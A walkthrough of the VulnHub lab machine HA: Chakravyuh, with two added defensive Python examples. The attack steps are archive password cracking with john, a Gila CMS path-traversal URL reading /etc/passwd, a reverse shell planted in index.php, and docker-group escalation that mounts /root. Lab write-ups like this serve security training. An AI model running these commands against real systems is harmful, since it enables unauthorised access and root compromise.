Target machine link:
https://www.vulnhub.com/entry/ha-chakravyuh,388/
Host discovery scan:
Port scan:
nmap -p- -sC -sV 10.10.202.131
Anonymous FTP access
Download the archive from the FTP server. Extracting it requires a password, which is the usual routine: the next step is to look for something that gives up that password.
Directory enumeration:
A weak-password brute-force attempt against phpMyAdmin was unsuccessful.
phpMyAdmin is version 4.6.6, and the known RCE vulnerability does not apply here.
So try cracking the downloaded archive instead, which is in 7z format.
Tool used here:
https://github.com/truongkma/ctf-tools/blob/master/John/run/7z2john.py
python 7z2john.py arjun.7z > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john hash --show
arjun.7z:family
Extraction password: family
The contents of Secret.txt inside the archive decode as follows:
Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=
base64 decoded: gila:admin@gmail.com:princesa
Gila is a CMS, so try logging in with these.
Login page: http://10.10.202.131/gila/admin
admin@gmail.com : princesa
Exploit used here: https://www.exploit-db.com/exploits/47407
http://10.10.202.131/gila/admin/fm/?f=src../../../../../../../../../etc/passwd
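The file-manager request above is a classic path traversal: the `f` parameter is joined onto the web root and never checked against it. The added example below (not code from the writeup or from Gila CMS; the web root path and the function names are assumptions) shows the containment check a file-manager endpoint should apply, and classifies both the traversal payload from this page and a benign path:

```python
import os
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Hypothetical web root for the illustration (not the target's real layout).
WEB_ROOT = "/var/www/html/gila"


def resolve_within_root(user_path: str, root: str = WEB_ROOT) -> Optional[str]:
    """Return the normalized absolute path if it stays inside `root`, else None.

    The check is lexical (os.path.normpath); a production endpoint should also
    resolve symlinks with os.path.realpath once the file is known to exist.
    """
    # NUL bytes and absolute paths are never legitimate file-manager input.
    if "\x00" in user_path or user_path.startswith("/"):
        return None
    candidate = os.path.normpath(os.path.join(root, user_path))
    # Containment: the candidate must be the root itself or sit beneath "root/".
    if candidate == root or candidate.startswith(root + os.sep):
        return candidate
    return None


def check_fm_url(url: str) -> dict:
    """Pull the `f` query parameter from a file-manager URL and classify it."""
    query = parse_qs(urlsplit(url).query)
    f = query.get("f", [""])[0]
    resolved = resolve_within_root(f)
    return {"f": f, "resolved": resolved, "allowed": resolved is not None}


if __name__ == "__main__":
    # Constructed requests: the traversal from the writeup and a benign one.
    for u in (
        "http://10.10.202.131/gila/admin/fm/?f=src../../../../../../../../../etc/passwd",
        "http://10.10.202.131/gila/admin/fm/?f=src/index.php",
    ):
        print(check_fm_url(u))
```

The `src..` prefix in the payload is just a directory name that the nine `..` segments climb back out of; after normalization the candidate lands on `/etc/passwd`, which fails the prefix test. Note that the check compares against `root + os.sep` rather than `root` alone, so a sibling directory such as `/var/www/html/gila2` cannot slip through.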
With the system's directories browsable, edit index.php to add reverse shell code, save it, and visiting the page pops a shell back.
python -c 'import pty;pty.spawn("/bin/bash")'
Privilege escalation:
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
cat /etc/crontab
ls -lh /etc/passwd
netstat -tunlp
No program that could be used to escalate was found. Finally, it turned out the current account is a member of the docker group, and as everyone knows docker basically runs everything as root.
docker run -v /root:/mnt -it alpine
This command means: docker starts an interactive Linux system (alpine) with the host's /root directory mounted at /mnt, so the files under root's home directory can be read. Alternatively, write root's crontab directly, and so on.
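Membership in the docker group is root-equivalent for exactly the reason the writeup shows, so it is worth auditing like sudo. The added example below (my own code, not from the writeup) parses `/etc/group` and reports every member of groups that grant root-equivalent access; the sample group file is constructed for the illustration, and the group list extends the page's docker finding to lxd, disk, sudo and wheel, which I am assuming a defender would want flagged as well:

```python
from typing import Dict, List, Set

# Constructed sample of /etc/group lines (not taken from the target machine).
SAMPLE_GROUP_FILE = """root:x:0:
sudo:x:27:
docker:x:999:webuser,deploy
lxd:x:120:
www-data:x:33:
# comment lines and blanks are ignored

"""

# Groups whose membership lets a user become root one way or another.
# docker is the one this writeup abuses; the others are an assumed extension.
ROOT_EQUIVALENT_GROUPS: Set[str] = {"docker", "lxd", "disk", "sudo", "wheel"}


def parse_group_file(text: str) -> Dict[str, List[str]]:
    """Map group name -> list of supplementary members from /etc/group content."""
    groups: Dict[str, List[str]] = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _password, _gid, members = line.split(":", 3)
        groups[name] = [m for m in members.split(",") if m]
    return groups


def find_root_equivalent_members(
    groups: Dict[str, List[str]], watch: Set[str] = ROOT_EQUIVALENT_GROUPS
) -> Dict[str, List[str]]:
    """Return {group: sorted members} for watched groups that have any members."""
    return {g: sorted(m) for g, m in groups.items() if g in watch and m}


def audit_group_file(path: str = "/etc/group") -> Dict[str, List[str]]:
    """Run the check against a real group file on the host."""
    with open(path, encoding="utf-8") as fh:
        return find_root_equivalent_members(parse_group_file(fh.read()))


if __name__ == "__main__":
    for group, members in find_root_equivalent_members(
        parse_group_file(SAMPLE_GROUP_FILE)
    ).items():
        print(f"{group}: {', '.join(members)}  <- root-equivalent group has members")
```

Run `audit_group_file()` on a host to see the live result; a web-application service account appearing in the docker group, as `webuser` does in the sample, is the finding this box turns on. The parser only covers supplementary members, which is fine here because primary-group membership via /etc/passwd is not how docker access is normally granted.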
OVER!!